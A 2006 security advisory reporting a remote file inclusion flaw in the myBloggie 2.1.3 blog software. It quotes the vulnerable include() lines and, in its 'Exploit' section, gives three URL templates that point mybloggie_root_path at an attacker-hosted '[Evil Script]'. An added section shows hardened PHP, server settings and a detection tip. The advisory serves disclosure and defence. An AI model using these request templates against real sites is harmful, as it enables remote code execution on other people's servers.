securityvulns.ru
From:sh3ll_(at)_sh3ll.ir <sh3ll_(at)_sh3ll.ir>
Date:11.08.2006
Subject:myBloggie <= 2.1.3 (mybloggie_root_path) Remote File Inclusion Vulnerability

-----------------------------------------------------------------------------------------

myBloggie 2.1.3 mybloggie_root_path Remote File Inclusion

-----------------------------------------------------------------------------------------

Author : Sh3ll

Date : 2006/04/29

Location : Iran - Tehran

HomePage : http://www.sh3ll.ir

Email : sh3ll[at]sh3ll[dot]ir

Critical Level : Dangerous

-----------------------------------------------------------------------------------------

Affected Software Description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : myBloggie

version : 2.1.3

URL : http://www.mywebland.com , http://mybloggie.mywebland.com

Description :

myBloggie is considered one of the simplest, most user-friendly, yet feature-packed weblog systems available to date.

-----------------------------------------------------------------------------------------

Vulnerabilities:

~~~~~~~~~~~~~~~

In admin.php, index.php & db.php we found vulnerable scripts:

----------------------------------------admin.php------------------------------------------

....
<?php
include($mybloggie_root_path.'spacer6.php');
?>
...

----------------------------------------index.php------------------------------------------

....
<?php
}
if (!isset($mode)) {
include($mybloggie_root_path.'blog.php');
}
$template->pparse('sidevert');
}
// End right sidemenu condition
// Sidemenu menu items. You can change the menu item order here
include($mybloggie_root_path.'calendar.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'category.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'recent.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'archives.php');
include($mybloggie_root_path.'spacer.php');
include($mybloggie_root_path.'user.php');
include($mybloggie_root_path.'spacer.php');
if ($search) {
include($mybloggie_root_path.'searchform.php');
include($mybloggie_root_path.'spacer.php');
}
...

-------------------------------------------db.php------------------------------------------

....
<?php
include($mybloggie_root_path .'includes/mysql.php');
?>
...

-----------------------------------------------------------------------------------------

Exploit:

~~~~~~~

http://www.target.com/[myBloggie]/admin.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/index.php?mybloggie_root_path=[Evil Script]

http://www.target.com/[myBloggie]/includes/db.php?mybloggie_root_path=[Evil Script]

Solution:

~~~~~~~~

Sanitize the variable $mybloggie_root_path in admin.php, index.php & db.php

-----------------------------------------------------------------------------------------

Shoutz:

~~~~~~

~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena

~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
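The Solution section above says only "sanitize the variable". As an added example from the fixing side (this is not myBloggie's code and not part of the advisory; the constant name MYBLOGGIE_ROOT, the include_module() helper and the module list are assumptions), the snippet below shows why the includes quoted in the advisory are exposed and how the same includes look when the root path is fixed by the deployment instead of being taken from the request:

```php
<?php
// Added example, not myBloggie's code. Shows the vulnerable include
// pattern quoted in the advisory next to a hardened replacement.

// --- Vulnerable pattern (as quoted in the advisory) ---
// With register_globals=On, a request parameter named
// mybloggie_root_path is turned into $mybloggie_root_path before the
// script runs, so the include target is chosen by the client:
//
//   include($mybloggie_root_path.'blog.php');

// --- Hardened pattern ---
// 1. The root path is a constant derived from the script's own
//    location and is never read from the request. Any inbound variable
//    of the same name is discarded so register_globals cannot supply it.
unset($mybloggie_root_path);
define('MYBLOGGIE_ROOT', rtrim(dirname(__FILE__), '/') . '/');

// 2. Only a fixed set of modules may be included. The module list is an
//    assumption based on the file names visible in the advisory.
$allowed_modules = array(
    'blog', 'calendar', 'spacer', 'category',
    'recent', 'archives', 'user', 'searchform',
);

// Includes one module from the allow-list under MYBLOGGIE_ROOT.
// Returns true when the file was included, false when the request was
// refused. Hypothetical helper name.
function include_module($name)
{
    global $allowed_modules;

    // Reject anything not on the allow-list; do not try to "clean" it.
    if (!in_array($name, $allowed_modules, true)) {
        return false;
    }

    // 3. realpath() collapses "..", resolves symlinks and returns false
    //    for paths that do not exist locally (a URL is not a local path),
    //    so the resolved file must still sit inside the application root.
    $path = realpath(MYBLOGGIE_ROOT . $name . '.php');
    if ($path === false || strpos($path, MYBLOGGIE_ROOT) !== 0) {
        return false;
    }

    include $path;
    return true;
}

// Usage, mirroring the index.php sidebar sequence from the advisory:
include_module('calendar');
include_module('spacer');
include_module('category');
if (!empty($_GET['search'])) {   // read input explicitly, never via register_globals
    include_module('searchform');
}
```

Two server-side settings close off the same class of bug independently of the application fix: register_globals = Off stops request parameters from becoming variables at all, and allow_url_include = Off (PHP 5.2 and later; allow_url_fopen = Off on older releases) stops include() from fetching remote code even if a path is attacker-controlled. For detection, requests carrying mybloggie_root_path as a query parameter are never legitimate for this application, so their presence in the web server access log is a reliable indicator to alert on.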

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod